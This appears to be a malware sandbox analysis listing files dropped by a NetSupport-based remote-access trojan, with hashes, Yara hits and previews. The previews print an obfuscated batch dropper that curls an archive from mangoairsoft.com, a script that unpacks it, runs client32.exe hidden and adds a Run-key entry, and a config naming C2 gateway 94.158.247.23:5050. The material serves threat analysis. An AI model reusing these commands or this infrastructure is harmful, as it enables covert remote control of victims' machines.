MD5:	88B1DAB8F4FD1AE879685995C90BD902
SHA1:	3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
SHA-256:	60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
SHA-512:	4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
Malicious:	false
Preview:	..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

C:\ProgramData\PCICHEK.DLL

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.292094060787929
Encrypted:	false
SSDEEP:	192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
MD5:	104B30FEF04433A2D2FD1D5F99F179FE
SHA1:	ECB08E224A2F2772D1E53675BEDC4B2C50485A41
SHA-256:	956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
SHA-512:	5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\PCICL32.DLL

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3740024
Entropy (8bit):	6.527276298837004
Encrypted:	false
SSDEEP:	49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
MD5:	D3D39180E85700F72AAAE25E40C125FF
SHA1:	F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
SHA-256:	38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
SHA-512:	471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
Malicious:	false
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

C:\ProgramData\PScripts\insert_delimiter.pscript

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1286
Entropy (8bit):	3.2151299174173276
Encrypted:	false
SSDEEP:	24:QesElfxUbrVQwd8fYLAgcti3fwTONDKA2tCO4YTONQO2ONDIc4TWoV:LdxUbZ7Jc8fwTOgvv4YTOp2OCcGV
MD5:	3C0C93F687DCE4D43BDB60237BBD0B54
SHA1:	D66CA3BC8AD49532ECD1B22241650C24DE801BA7
SHA-256:	4B460FDE39403B5FC251388363565BDCF4B3EB1FD23873154EFE61E6FC482042
SHA-512:	06614A9C48B904D616AC2B60A9DF06ECA67A0EAB15A700563D98B10CB0F0461C0F978EC4289328AEAD6561226DF1391E973B8D1C1EA58822F6CF57183F525A33
Malicious:	false
Preview:	..{.....I.n.s.e.r.t. .a. .d.e.l.i.m.i.t.e.r. .a.t. .e.v.e.r.y. .n.-.t.h. .p.o.s.i.t.i.o.n.....}.........v.a.r..... . .i.:. .i.n.t.e.g.e.r.;..... . .j.:. .i.n.t.e.g.e.r.;..... . .k.:. .i.n.t.e.g.e.r.;..... . .d.:. .s.t.r.i.n.g.;. ././. .i.n.p.u.t. .b.u.f.f.e.r..... . .s.:. .s.t.r.i.n.g.;. ././. .o.u.t.p.u.t. .b.u.f.f.e.r..... . .d.l.m.t.:. .s.t.r.i.n.g.;..... . .s.t.e.p.:. .i.n.t.e.g.e.r.;.....b.e.g.i.n..... . ..... . .s.t.e.p. .:.=. .4.;..... . .i. .:.=. .0.;. ././. .o.f.f.s.e.t..... . .d.l.m.t. .:.=. .'.%.u.'.;..... . ..... . .d. .:.=. .R.e.a.d.D.o.c.;..... . .s. .:.=. .'.'.;..... . .j. .:.=. .l.e.n.g.t.h.(.d.).;..... . .w.h.i.l.e. .i. .<. .j. .d.o..... . .b.e.g.i.n..... . . . .s. .:.=. .s. .+. .d.l.m.t.;. ././. .i.n.s.e.r.t. .d.e.l.i.m.i.t.e.r. .b.e.f.o.r.e. .d.a.t.a. .m.e.m.b.e.r..... . . . .f.o.r. .k. .:.=. .1. .t.o. .s.t.e.p. .d.o..... . . . .b.e.g.i.n..... . . . . . .i.f. .(.i. .+. .k.). .<.=. .l.e.n.g.t.h.(.d.). .t.h.e.n..... . . . . . .s. .:.=. .s. .+. .d.[.i. .+. .k.].;..... .

C:\ProgramData\PScripts\rot-13.pscript

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	3.358913269584849
Encrypted:	false
SSDEEP:	24:Qe9J9qno9H6/oqspi7lk+ejGeIYelmpoO67SrZetYelJoO672ZeoYel0oO67SrZj:LD9wC6/VsGlk+sH6JH63H6JH6d
MD5:	AC1CD856F434464D3F68465061171D0A
SHA1:	57AE543F84214CF00576DB15BD24D2E1F3BD4768
SHA-256:	2E4BD5557AEDD1743DA5FAB1B6995FBC447D6E9491D9EC59FA93AB889D8BCCD1
SHA-512:	6348F2C1DD131231F041B5E59BB83EB7E337C93799A955DF66FB077DC3B91659263CF8780BC7A6A007008155CC2C83B0AB1AC145ABCA2A8FA7D3500AF46D1A49
Malicious:	false
Preview:	..{.....R.O.T. .1.3.....}.....v.a.r..... . .S.t.r.L.e.n.,. .i.,. .c.h.a.r.N.u.m. .:. .W.o.r.d.;..... . .I.n.p.u.t.,. .o.u.t.p.u.t.:. .s.t.r.i.n.g.;.....b.e.g.i.n..... . .I.n.p.u.t. .:.=. .R.e.a.d.D.o.c.;..... . .O.u.t.p.u.t. .:.=. .'.'.;..... . .S.t.r.L.e.n. .:.=. .L.e.n.g.t.h.(.I.n.p.u.t.).;......... . .f.o.r. .i.:.=. .1. .t.o. .S.t.r.L.e.n. .d.o..... . .b.e.g.i.n..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.A.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.M.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.N.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.Z.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .-. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.a.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.m.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.

C:\ProgramData\Settings.txt

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Generic INItialization configuration [en]
Category:	dropped
Size (bytes):	729
Entropy (8bit):	5.161224970148946
Encrypted:	false
SSDEEP:	12:Sx425viDEWeQrCISTiS/RQDIYm1S8Cye07xWXgeVWBmmeAFm7Vp67WpAny:SN5viDdrtSOSu0YYTNkWQaaVw7WGy
MD5:	BCCC9E937D8D72A12743D75A6B396A34
SHA1:	7AC820493A357F17230CDCEEF37C69BF2510AB5C
SHA-256:	8CB0F6D438DB151ED507299A64031B5C957141CFC632ACE95B9135168E0FD121
SHA-512:	F9A42E7CCF3DF6D99846E8B05FE21C4D5CAFDFC24F97C0EEFBAE1E27B674E637FEAAE86A52E680A12A074AE695CD2E80FC8E5588AD46063B3ADBB4A6CB9D5CE2
Malicious:	false
Preview:	[Downloader]..UseUserAgent=1..UserAgentString=Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1) Opera 7.50 [en]..UseProxy=0..AutoRedirect=0..AutoReferrer=1..AutoParseLinks=1..UseCookies=1..SaveAsProject=1..AutoComplete=0..URLHistory=1..UseReferrer=1..ExtendedInfo=1..[Decoder]..UseHighlight=1..ReplaceEval=0..ReplaceEvalWith=evla..OverrideEval=0..AutoReplaceEval=0..[Proxy]..Address=..Port=..User=..Pass=..Hidden=1..[Monitor]..Multi=0..[Misc]..ClearClipboard=0..AutoParseLinks=1..ReplaceEval=0..ReplaceEvalWith=evla..AutoReplaceEval=0..ClearCache=1..ClearHistory=0..Language=default.lng..Highlight=1..OverrideEval=1..FontName=Tahoma..FontSize=8..[Display]..Highlight=1..FontName=MS Shell Dlg 2..FontSize=8..AutoFocusDecoder=0..

C:\ProgramData\TCCTL32.DLL

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.809064783360712
Encrypted:	false
SSDEEP:	12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
MD5:	EAB603D12705752E3D268D86DFF74ED4
SHA1:	01873977C871D3346D795CF7E3888685DE9F0B16
SHA-256:	6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
SHA-512:	77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\client32.exe

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	101680
Entropy (8bit):	4.481468672521447
Encrypted:	false
SSDEEP:	384:qUjV5+6j6Qa86Fkv2Wr120hZIq6nYPL7NheMxnB1:qgVZl6FhWr80/h6EN/
MD5:	F70B67C2B3204B7DDD8B755799CCCFF0
SHA1:	A42E55E328D62D11E687C167BB7049D46F0F9B26
SHA-256:	213AF995D4142854B81AF3CF73DEE7FFE9D8AD6E84FDA6386029101DBF3DF897
SHA-512:	54FCBA8A063BFBAAE4C3A39624BF3407DB6AF5699AB8686F936AB03C5864DF7A44D089066FA2D4AEDF5AD50D6B04624966A5111BF57BEC1DDA74A571F1DD7C63
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@.......................................@.................................< ..<....0...i...........t..0........... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\client32.ini

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	714
Entropy (8bit):	5.272982980469994
Encrypted:	false
SSDEEP:	12:EbxS2h3q+jhGSGpBlsVTXuZ7+DP98XTKIDWss1CYublufN3Bu6a39GJ/:EbI2hFhapBlLoGXuIDvsPuGYT34t
MD5:	A61475B49FEA7E08719A7E8AD1C5D278
SHA1:	60591111A837C93ACF7E32096F43EA704831DA35
SHA-256:	DC020C98ED1D39721AD1F127DC0C04A0735BD47C6B6ECD222683210A601D90DB
SHA-512:	1CDAF447E9E591D44A1DE10453008391EE80EEF3FEC0EC8A6D354C15A9412AD87F7F33ABDF8F7C0F061F6FA70F759CDEB1352B620609B0A6F3E4AF82636D19FC
Malicious:	false
Preview:	0xb47c726d....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=0..DisableClientConnect=0..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=1..DisableMessage=1..DisableReplayMenu=0..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Users\Administrator\Desktop\1\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=94.158.247.23:5050..GSK=FH;G@ADJ9J>ICLHA=K@MED..Port=5050..SecondaryGateway=..SecondaryPort=..

C:\ProgramData\desktop.ini

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Windows desktop.ini
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.862313970853504
Encrypted:	false
SSDEEP:	3:0NdQDjo/KKQiWDy3c5kSRE2J5oH+fqLEcTvzTXyn:0NwoCKQiWDy3IZi23oH+4TvzTXyn
MD5:	B21BF903986AC0CE3B7BB2371C8502D2
SHA1:	FC8C4D1630A2198A95F9739BF16F53E83BF81174
SHA-256:	BB2DF21D474ED3E383FE56691DD5FE9E441F2B163A82A2D4D1042783F249B70F
SHA-512:	3B0BA816CEA96FB8648A6A3CD9421EBC03065C02B4047D29834B417EF25A10DE1B5B8DDFEE5BB85761D185DDB1B36F37193CAAE0B7894B5E3850F061459DF197
Malicious:	false
Preview:	[.ShellClassInfo]..IconResource=C:\Users\daddy\AppData\Local\Microsoft\OneDrive\OneDrive.exe,1..

C:\ProgramData\fyAAWPXvDMiNSTKqVPpzzNr.bat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1908
Entropy (8bit):	5.243181486469752
Encrypted:	false
SSDEEP:	24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
MD5:	CC74CF81F442E922B077F6CF0F87FA41
SHA1:	D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
SHA-256:	6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
SHA-512:	1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
Malicious:	false
Preview:	@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

C:\ProgramData\lolo.7z

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	7-zip archive data, version 0.4
Category:	modified
Size (bytes):	2306944
Entropy (8bit):	7.999915641276459
Encrypted:	true
SSDEEP:	49152:rDHf7GK0RIZLYUIFWsFYL7084J3Sr7Y1t/iAJkxNkvTMTTi0oIFJePBM5Pl:rDHfcyZ8/FW8Y9m9i5IvEP
MD5:	8970FCCD38432D3A6EEFED2F274709DF
SHA1:	5EEFA6D5AF3ADC5A84A5E7BA66DE87779221CC02
SHA-256:	CEA3F6928121BF4382E7144B9A900CDCBECB7B7F95A14531EC0C04286A08489E
SHA-512:	B647573EC25890736D94978AFB6E45C6762BA97963D91911CCD3ABF83660DA464496A4AD5AF9AFA6CAADAC76C6BE8D76B83E3DBC1987076F2560E3D7AF452B95
Malicious:	false
Preview:	7z..'...b...;3#.....%........}.4....N]...........&...@...ZtA.4..x=i...h.5.UBh.K....KB}"GA..........x.....6.c.8..V.>..3.3.~...b..X......W.b...w....ubQ...h[....`..3)....>......U..K..Y.0}(.g..7..brw..y..../3z.t...,.g.@...aJ......0K........'Q......s.2!.@..7.g..~....a..........V.N3....../Mr$.yL.N...CKu8."N.i......#w..Oc...!..6.c..0......%.?.0..:...d....F..n..!....zz..v.9W..UB.n0........w..P...JD......L&..^G.o..(D..`y..e.N.B/..l...&..L..,.$..3.l.<G....C.a5...S.70g}...s........;.....#.#BlO.....h.5....u...y......NUU...B..S.m.......Q..E.D...6.. K.r.E....A.8..J;...5..q..(......V#...'......)....,.M.I..s...#j..s.%.Z$....n<.......a...53u.,....^o....7j...;.2....1.N)p..>........L....qK\..$....@U.....I.F@.E+.....~......aI^...w....V.t..o...2U,".d.4.......}..<.L.U.....z..a..7u.U1..ua`.....T.7....a.$.....N;..t.Fa7...?..s9.....ICU...;.w..F.w.[A@x.....U.k.$..!D.......C$h.I.._.h*...q...T...mN\|....?/.......us.>..M..+..h......yBF.-...S...?b.f)......L..8......{f

C:\ProgramData\msvcr100.dll

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\nskbfltr.inf

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\ProgramData\nsm_vpro.ini

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\ProgramData\pcicapi.dll

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.7376663312239256
Encrypted:	false
SSDEEP:	768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
MD5:	34DFB87E4200D852D1FB45DC48F93CFC
SHA1:	35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
SHA-256:	2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
SHA-512:	F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\putty.exe

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1647912
Entropy (8bit):	6.92723334837222
Encrypted:	false
SSDEEP:	49152:TDXOPFJK9bbYF8paMB8QMy3bHwPXNg/7UyW+ekBeZmn:T0WhreNg/X
MD5:	F838FDAFD0881CF1E6040A07D78E840D
SHA1:	2A35456B2F67BD12905378BEB6EAF373F6A0D0D1
SHA-256:	FC6F9DBDF4B9F8DD1F5F3A74CB6E55119D3FE2C9DB52436E10BA07842E6C3D7C
SHA-512:	5C0389EB79E5C2638C0D770CDE1A5C56A237AA596503966D4F226A99F94531AF501F8BF4EFA00722E12998F73271E50D8C187F8E984125AFFE40B1AB231503B4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....\c.........."......Z...p.................@.............................`......D.....`.............................................................X.......xl......(W...@..................................(......@...........(................................text...fY.......Z.................. ..`.rdata.......p.......^..............@..@.data....U...p.......^..............@....pdata..xl.......n...n..............@..@.00cfg..8....@......................@..@.gxfg...`*...P...,..................@..@.tls................................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc.......@... ..................@..B........................................................................................................................................................................................................................

C:\ProgramData\qweq.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	532
Entropy (8bit):	5.259398326283338
Encrypted:	false
SSDEEP:	12:kh5ObfauP28nlxWZ3lMVj0ESLXRtf4LXnidEWSDcEA:B62AlMVJuXRtf8XnIED2
MD5:	975B043ED876F1C265AACB60BBEA6B11
SHA1:	3B8F7AE6B0282BE88D08B171BF9267FDF4CBF28E
SHA-256:	F344211B6F67F0AE3D6256648526C6E986EC8E4F31367FA17AB963DE788BD6D8
SHA-512:	E9D2E306B9A562E94B8793C87B7C4506274D67561D715871DFF1E88038C7413F32307602F5DDC97363A62875B16BBBD307D01DA897C88C6EB33F004A6FAE4877
Malicious:	false
Preview:	@echo off....:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6..:: ssRbZgs6gsgs326fssRb....start /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /c C:\ProgramData\client32.exe....set CachedX=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run..reg query "%CachedX%" >nul 2>&1.. if %errorlevel% equ 0 (.. reg add "%CachedX%" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f .. ).. ::fhgggsgs3sgs3sgssgs3sgssgs

C:\ProgramData\remcmdstub.exe

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.446503462786185
Encrypted:	false
SSDEEP:	1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
MD5:	6FCA49B85AA38EE016E39E14B9F9D6D9
SHA1:	B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
SHA-256:	FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
SHA-512:	F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
